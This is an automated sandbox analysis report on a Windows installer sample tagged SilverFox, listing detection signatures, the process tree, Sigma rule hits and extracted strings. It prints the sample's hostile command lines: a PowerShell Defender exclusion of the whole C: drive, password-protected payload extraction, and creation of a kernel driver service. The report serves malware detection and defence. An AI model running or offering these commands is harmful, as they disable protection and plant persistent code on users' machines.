Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.4.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.4.exe
renamed because original name is a hash value
Original sample name: _2.0.4.exe
Analysis ID: 1579693
MD5: a32b45411fdacb8dc364e2ecc75f7c54
SHA1: a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
SHA256: 1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: A32B45411FDACB8DC364E2ECC75F7C54)
    • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7300 cmdline: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 7316 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7880 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.4.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: A32B45411FDACB8DC364E2ECC75F7C54)
        • #U5b89#U88c5#U52a9#U624b_2.0.4.tmp (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 7600 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7680 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7568 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7584 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7896 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7924 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8144 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3492 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7620 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7740 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7760 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7860 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7876 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7980 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7944 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7528 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7344 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6948 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5228 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7852 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7888 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7300, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7316, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7584, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7300, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7316, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7584, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ParentProcessId: 7300, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7316, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc | Virustotal: Detection: 10%
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe | Virustotal: Detection: 9%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 91.9% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb | source: 7zr.exe, 0000000B.00000003.1738474598.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1738614341.0000000003640000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Code function: 5_2_6C7AAEC0 FindFirstFileA,FindClose,5_2_6C7AAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00C76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00C76868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00C77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00C77496
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1686038392.0000000004090000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
